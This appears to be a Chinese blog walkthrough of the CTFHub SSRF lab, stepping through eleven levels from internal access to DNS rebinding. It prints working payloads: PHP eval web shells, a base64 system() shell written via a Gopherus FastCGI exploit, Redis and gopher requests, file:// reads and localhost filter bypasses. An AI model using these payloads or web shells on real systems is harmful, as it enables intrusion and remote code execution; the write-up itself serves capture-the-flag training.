CTFHUB靶场关于SSRF保姆级攻略

发布于:2024-12-19 ⋅ 阅读:(16) ⋅ 点赞:(0)
微信交流群:https://732903.hlcode.cn/?id=NK1fWUR

一.内网访问

输入127.0.0.1/flag.php

二.伪协议读取文件

输入?url=file:///var/www/html/flag.php

右键页面查看源代码

三.端口扫描

尝试一下index.php,没有显示,说明有这个文件

上方题中提示我们端口在8000-9000中我们用burp suite抓包,开启代理

输入?url=127.0.0.1:8000/index.php

右键空白处,发送到intruder,选中端口8000,再点击添加payload

在进入到payload中,按照下图填选,选中。

我们看这个200响应码的,去访问就会得到答案

四.POST请求

我们输入?url=http://127.0.0.1/flag.php

再查看页面源代码,我们发现有一个钥匙

复制下来,去把它放到白色框中,抓它的包,把下方图片的框中的内容全部删掉

然后改成向下方图一样的字样

再将这些数据复制下来,去进行第一次url编码

地址:CTF在线工具-在线URL编码|URL解码

将编码后的内容复制下来去打开记事本,粘贴下来,点击替换

将%0a替换为%0d%0a

再在最末尾也加上%0d%0a

将他们复制下来,进行第二次url编码

将二次编码的结果复制下来去原网址访问

将上方%253A换成冒号

回车

我们就会得到flag了

五.上传文件

上方提示我们需要上传文件

所以我们输入?url=file:///var/www/html/flag.php

就会得到下方图片的内容

这个需要我们写一个一句话木马文件上传,但是没有提交按钮,我们来自己构造一个

右键选择检查,在下方框中添加<input type="submit" name="submit">再点击空白处

就会出现一个按钮

我们创建一个名为1.php的文件,里面

输入<?php @eval($_POST[cmd]); ?>

保存后带年纪浏览,选中这个木马文件,这个时候打开代理,准备抓包

下方就是我们抓到的数据包

与POST请求关卡相似,改成下方的模样

全部复制下来,进行第一次url编码

将结果复制,打开记事本,把%0a替换为%0d%0a,再把结尾加上%0d%0a

全部复制下来,再去进行第二次url编码

将结果复制下来,去访问,记得把%253A换成冒号,就得到flag了

六.FastCGI协议

这里有一个题目附录,在这关我们需要用到一款名为Gopherus工具,还需要用到python2的环境,我这里是在kali做的,工具大家自己去下载

在kali中,点进这个工具

在这里打开终端

输入python2 gopherus.py查看一下用法

了解之后,我们在

输入python2 gopherus.py --exploit fastcgi

在上方输入/var/www/html/index.php

这里我们上传一个一句话木马,利用base64编码一下

在输入echo "PD9waHAgQHN5c3RlbSgkX0dFVFsnYSddKTsgPz4=" | base64 -d > 666.php

将下方框中的内容复制下来

在进行一次url编码

出现上访的情况就说明写进去了

在输入666.php?a=ls%20../../../;

我们会看到一个flag_617c826d2c56425e32808f1b4afefafb的文件,cat一下,得到flag

七.Redis

这关与上一关相似

输入python2 gopherus.py --exploit redis

输入PHPshell

输入/var/www/html或者直接回车

输入<?php @eval($_POST[a]) ?>或者直接回车

进行url编码

将结果复制下来,去访问

这里我们直接点旁边的X,结束,在访问一下shell.php,看看我们的木马是否写进去了

这就说明我们的木马已经写进去了,这回我们用蚁剑连一下

我们来到根目录,向下翻,看见了一个flag_25a71a953929896cac24e78b3f84d6dd文件

点进去,就发现了flag

八.URL Bypass

这里给出了提示

输入?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

上方的@表示左边的当成用户,右边的是网址,而提示又说必须用http://notfound.ctfhub.com才能访问,所以我们用一个@就可以解决

九.数字IP Bypass

输入?url=127.0.0.1/flag.php

我们发现它ban掉了127,172,@

所以我们用16进制来代替127.0.0.1

输入?url=0x7F000001/flag.php

十.302跳转 Bypass

输入?url=http://0.0.0.0/flag.php

或者

输入

十一.DNS重绑定 Bypass

在B输入127.0.0.2

回车

将下方红框中的复制

访问?url=http://7f000001.7f000002.rbndr.us/flag.php得出flag

以上就是SSRF的全部通关攻略!!!

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布